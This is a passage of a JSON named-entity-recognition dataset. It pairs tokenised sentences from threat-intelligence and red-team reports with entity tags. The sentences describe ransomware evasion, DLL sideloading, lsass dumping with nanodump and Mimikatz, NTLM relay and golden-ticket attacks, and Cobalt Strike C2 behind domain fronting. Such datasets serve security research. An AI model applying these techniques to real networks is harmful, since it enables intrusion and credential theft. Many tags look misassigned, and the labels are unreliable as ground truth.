"O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "archive", - "containing", - "the", - "ransomware," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "decompression", - "utility", - "to", - "extract", - "the", - "ransomware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp" - ] - }, - { - "tokens": [ - "drop", - "the", - "defenses", - "of", - "the", - "victim,", - "inhibit", - "monitoring,", - "disable", - "networking" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stops", - "specific", - "defensive", - "services", - "(Windows", - "Defender,", - "etc)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Will", - "also", - "skip", - "enumeration", - "and", - "stopping", - "of", - "antivirus", - "software.-" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "authenticate", - "to", - "the", - "site", - "behind", - "the", - "onion", - "link", - "on", - "the", - "TOR", - "network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ShellExecuteA", - "is", - "also", - "used", - "to", - "launch" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "API", - "call", - "attempts", - "to", - "processes:" - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "local", - "module", - "utilizes", - "the", - "LookupPrivilegeValueW", - "and", - "AdjustTokenPrivileges", - "that", - "Windows", - "API", - "calls", - "on", - "its", - "own", - "process", - "via", - "GetCurrentProcess", - "and", - "OpenProcessToken", - "to", - "obtain", - "SeDebugPrivilege", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "Active", - "Directory", - "group", - "policies", - "allows", - "the", - "malicious", - "actor", - "to", - "hit", - "all", - "systems", - "in", - "the", - "environment", - "for", - "as", - "long", - "as", - "that", - "group", - "policy", - "is", - "active", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Potential", - "Process", - "Hollowing" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "more", - "sophisticated", - "encryption" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "technique", - "for", - "encryption-decryption", - "is", - "easily", - "more", - "discernable", - "during", - "analysis", - "because", - "both", - "the", - "encrypted", - "data", - "and", - "the", - "mapping", - "are", - "in", - "the", - "same", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "for", - "its", - "execution", - "technique", - "of", - "hiding", - "malicious", - "code", - "inside", - "log", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "bytes", - "of", - "the", - "encrypted", - "section", - "is", - "a", - "specific", - "index", - "on", - "the", - "byte", - "map" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Though", - "this", - "is", - "a", - "very", - "rigid", - "method", - "of", - "hiding", - "its", - "codes," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "byte", - "remapping", - "to", - "ensure", - "that", - "the", - "shellcode", - "cannot", - "be", - "easily", - "decrypted", - "without", - "the", - "correct", - "byte", - "map" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "usually", - "the", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shows", - "that", - "their", - "offsets", - "within", - "the", - "encrypted", - "region", - "remain", - "the", - "same", - "since", - "they", - "result", - "in", - "a", - "similar", - "shellcode", - "even", - "if", - "they", - "are", - "composed", - "of", - "different", - "bytes", - "per", - "binary." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "checks", - "if", - "there", - "are", - "monitoring", - "tools,", - "specifically", - "Process", - "Monitor,", - "running", - "in", - "the", - "current", - "machine", - "with", - "the", - "following", - "strings:", - "procmon", - "procmon64", - "procmon64a" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "checks", - "for", - "a", - "few", - "installed", - "and", - "active", - "antivirus", - "products,", - "namely:", - "Windows", - "Defender", - "ESET" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "I-SecTeam" - ] - }, - { - "tokens": [ - "the", - "malware", - "proceeds", - "to", - "decrypt", - "the", - "PowerShell", - "code" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Furthermore,", - "since", - "the", - "data", - "to", - "be", - "decrypted", - "is", - "in", - "another", - "file,", - "the", - "routine", - "becomes", - "even", - "more", - "difficult", - "to", - "investigate,", - "as", - "analysts", - "would", - "need", - "the", - "correct", - "pair", - "for", - "decryption." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Afterward,", - "the", - "shellcode", - "will", - "then", - "decrypt", - "and", - "load", - "the", - "main", - "ViperSoftX", - "DLL", - "embedded", - "within", - "the", - "carrier." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Moreover,", - "all", - "the", - "strings,", - "binaries,", - "and", - "other", - "relevant", - "data", - "within", - "the", - "ViperSoftX", - "DLL", - "also", - "gets", - "decrypted", - "the", - "same", - "way." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actual", - "bytes", - "of", - "the", - "decrypted", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "crawl", - "through", - "different", - "paths", - "in", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scans", - "for", - "these", - "cryptocurrency", - "wallets", - "in", - "local", - "directories:", - "Armory", - "Atomic", - "Wallet", - "Binance", - "Bitcoin", - "Blockstream", - "Green", - "Coinomi", - "Delta", - "Electrum", - "Exodus", - "Guarda", - "Jaxx", - "Liberty", - "Ledger", - "Live", - "Trezor", - "Bridge" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "the", - "use", - "of", - "DLL", - "sideloading", - "for", - "its", - "arrival", - "and", - "execution", - "technique." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "found", - "in", - "the", - "sideloaded", - "DLL." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "sideloaded", - "DLL)," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "sideloading" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "While", - "other", - "cybercriminals", - "use", - "sideloading", - "to", - "load", - "another", - "non-binary", - "component" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "We", - "have", - "also", - "found", - "that", - "each", - "sideloader", - "DLL", - "has", - "its", - "own", - "pair", - "of", - "executable", - "and", - "byte", - "map," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "still", - "downloads", - "a", - "PowerShell", - "code" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "or", - "Windows", - "Scripting" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "File-packed", - "Magniber", - "ransomware" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "obtain", - "the", - "credentials,", - "the", - "team", - "took", - "a", - "snapshot", - "of", - "lsass.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "with", - "a", - "tool", - "called", - "nanodump,", - "exported", - "the", - "output,", - "and", - "processed", - "the", - "output", - "offline", - "with", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "team", - "obtained", - "the", - "cached", - "credentials", - "from", - "a", - "SharePoint", - "server", - "account", - "by", - "taking", - "a", - "snapshot", - "of", - "lsass.exe", - "with", - "a", - "tool", - "called", - "nanodump,", - "exporting", - "the", - "output", - "and", - "processing", - "the", - "output", - "offline", - "with", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "They", - "then", - "used", - "forged", - "credentials", - "to", - "move", - "to", - "multiple", - "hosts", - "across", - "different", - "sites", - "in", - "the", - "environment", - "and", - "eventually", - "gained", - "root", - "access", - "to", - "all", - "workstations", - "connected", - "to", - "the", - "organization’s", - "mobile", - "device", - "management", - "(MDM)", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "this", - "root", - "access", - "to", - "move", - "laterally", - "to", - "SBS-connected", - "workstations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "team", - "attempted", - "to", - "determine", - "valid", - "accounts", - "based", - "on", - "group", - "name", - "and", - "purpose" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "attempted", - "to", - "leverage", - "these", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "From", - "that", - "host,", - "the", - "team", - "moved", - "laterally", - "to", - "a", - "misconfigured", - "server,", - "from", - "which", - "they", - "compromised", - "the", - "domain", - "controller", - "(DC)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "with", - "a", - "button,", - "which,", - "when", - "clicked,", - "downloaded", - "a", - "“malicious”", - "ISO", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "the", - "download,", - "another", - "button", - "appeared,", - "which,", - "when", - "clicked,", - "executed", - "the", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Users", - "downloaded", - "and", - "executed", - "the", - "team’s", - "initial", - "access", - "payloads", - "after", - "clicking", - "buttons", - "to", - "trigger", - "download", - "and", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "used", - "compromised", - "workstation", - "and", - "domain", - "admin", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "a", - "previously", - "compromised", - "workstation", - "admin", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "a", - "previously", - "compromised", - "domain", - "admin", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "team", - "leveraged", - "compromised", - "workstation", - "and", - "domain", - "admin", - "accounts", - "to", - "execute", - "a", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "team", - "compromised", - "a", - "domain", - "admin", - "account", - "and", - "used", - "it", - "to", - "laterally", - "to", - "multiple", - "workstations", - "and", - "the", - "DC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "used", - "compromised", - "workstation", - "and", - "domain", - "admin", - "accounts", - "to", - "upload", - "a", - "payload", - "via", - "SMB", - "on", - "several", - "target", - "Workstations", - "and", - "the", - "DC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "a", - "previously", - "compromised", - "workstation", - "admin", - "account", - "to", - "upload", - "and", - "execute", - "a", - "payload", - "via", - "SMB" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Use", - "a", - "previously", - "compromised", - "domain", - "admin", - "account", - "to", - "upload", - "and", - "execute", - "a", - "payload", - "via", - "SMB" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "team’s", - "C2", - "redirectors", - "used", - "HTTPS", - "reverse", - "proxies", - "to", - "redirect", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "HTTPS" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "HTTPS", - "beacon" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "post-exploit", - "tool", - "that", - "leverages", - "HTTP", - "protocols", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "HTTPS", - "reverse", - "proxies", - "to", - "redirect", - "C2", - "traffic" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Establish", - "a", - "session", - "that", - "originates", - "from", - "a", - "target", - "Workstation", - "system", - "directly", - "to", - "an", - "external", - "host", - "over", - "a", - "clear", - "text", - "protocol,", - "such", - "as", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Establish", - "a", - "session", - "that", - "originates", - "from", - "a", - "target", - "Domain", - "Controller", - "system", - "directly", - "to", - "an", - "external", - "host", - "over", - "a", - "clear", - "text", - "protocol,", - "such", - "as", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "used", - "HTTPS", - "reverse", - "proxies", - "to", - "redirect", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "team", - "uploaded", - "and", - "executed", - "well-known", - "malicious", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "to", - "download", - "and", - "execute", - "a", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upload", - "and", - "execute", - "a", - "well-known", - "(e.g.,", - "with", - "a", - "signature)", - "malicious", - "file", - "to", - "a", - "target", - "DC", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "redirectors", - "to", - "redirect", - "C2", - "traffic", - "between", - "the", - "target", - "organization’s", - "network", - "and", - "the", - "team’s", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "HTTPS", - "reverse", - "proxies", - "to", - "redirect", - "C2", - "traffic", - "between", - "target", - "network", - "and", - "the", - "team’s", - "Cobalt", - "Strike", - "servers." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "these", - "platforms", - "to", - "create", - "flexible", - "and", - "dynamic", - "redirect", - "servers", - "to", - "send", - "traffic", - "to", - "the", - "team’s", - "Cobalt", - "Strike", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "redirectors", - "used", - "HTTPS", - "reverse", - "proxies", - "to", - "redirect", - "C2", - "traffic", - "between", - "the", - "target", - "organization’s", - "network", - "and", - "the", - "Cobalt", - "Strike", - "team", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-SecTeam", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "domain", - "fronting", - "to", - "disguise", - "outbound", - "traffic", - "in", - "order", - "to", - "diversify", - "the", - "domains", - "with", - "which", - "the", - "persistent", - "beacons", - "were", - "communicating." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "domain", - "fronting", - "[T1090.004]", - "to", - "disguise", - "outbound", - "traffic", - "in", - "order", - "to", - "diversify", - "the", - "domains", - "with", - "which", - "the", - "persistent", - "beacons", - "were", - "communicating" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "technique,", - "which", - "also", - "leverages", - "CDNs,", - "allows", - "the", - "beacon", - "to", - "appear", - "to", - "connect", - "to", - "third-party", - "domains,", - "such", - "as", - "nytimes.com,", - "when", - "it", - "is", - "actually", - "connecting", - "to", - "the", - "team’s", - "redirect", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "technique", - "leverages", - "CDNs", - "associated", - "with", - "high-reputation", - "domains", - "so", - "that", - "the", - "malicious", - "traffic", - "appears", - "to", - "be", - "directed", - "towards", - "a", - "reputation", - "domain", - "but", - "is", - "actually", - "redirected", - "to", - "the", - "red", - "team-controlled", - "Cobalt", - "Strike", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "which", - "prompted", - "DC", - "authentication", - "to", - "the", - "SharePoint", - "server", - "using", - "the", - "server’s", - "NTLM", - "hash.", - "The", - "team", - "then", - "deployed", - "Rubeus", - "to", - "capture", - "the", - "incoming", - "DC", - "TGT" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "performed", - "an", - "NTLM-relay", - "attack", - "to", - "obtain", - "the", - "DC’s", - "TGT,", - "followed", - "by", - "a", - "golden", - "ticket", - "attack", - "on", - "a", - "SharePoint", - "server", - "with", - "Unconstrained", - "Delegation", - "to", - "gain", - "the", - "ability", - "to", - "impersonate", - "any", - "Site", - "1", - "AD", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "ran", - "the", - "DFSCoerce", - "python", - "script,", - "which", - "prompted", - "DC", - "authentication", - "to", - "a", - "server", - "using", - "the", - "server’s", - "NTLM", - "hash.", - "The", - "team", - "then", - "deployed", - "Rubeus", - "to", - "capture", - "the", - "incoming", - "DC", - "TGT." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "ran", - "the", - "DFSCoerce", - "python", - "script,", - "which", - "prompted", - "DC", - "authentication", - "to", - "a", - "server", - "using", - "the", - "server’s", - "NTLM", - "hash" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "some", - "instances,", - "they", - "used", - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "Event", - "Subscriptions" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "WMI", - "Event", - "Subscriptions", - "to", - "move", - "laterally", - "between", - "sites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "command-line", - "tool" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "stored", - "credentials", - "in", - "a", - "database", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "searched", - "files", - "on", - "the", - "server,", - "and", - "found", - "plaintext", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "plaintext", - "credentials", - "in", - "PowerShell", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "team", - "found", - "a", - ".txt", - "file", - "containing", - "plaintext", - "credentials", - "for", - "the", - "user" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "found", - "plaintext", - "credentials", - "to", - "an", - "API", - "user", - "account", - "stored", - "in", - "PowerShell", - "scripts", - "on", - "an", - "MDM", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "the", - "pattern", - "discovered", - "in", - "these", - "credentials,", - "the", - "team", - "was", - "able", - "to", - "crack", - "the", - "user’s", - "workstation", - "account", - "password" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "cracked", - "a", - "user’s", - "workstation", - "account", - "password", - "after", - "learning", - "the", - "user’s", - "patterns", - "from", - "plaintext", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Detect", - "and", - "Identify", - "source", - "IP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Detect", - "and", - "Identify", - "source", - "IP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Detect", - "and", - "identify", - "source", - "IP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Detect", - "and", - "identify", - "source", - "IP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Detect", - "and", - "identify", - "source", - "IP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Service", - "Creation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Service", - "Creation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Service", - "Creation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "a", - "payload", - "via", - "SMB", - "and", - "Windows", - "Service", - "Creation,", - "respectively,", - "on", - "several", - "target", - "Workstations." - ], - "ner_tags": [ - 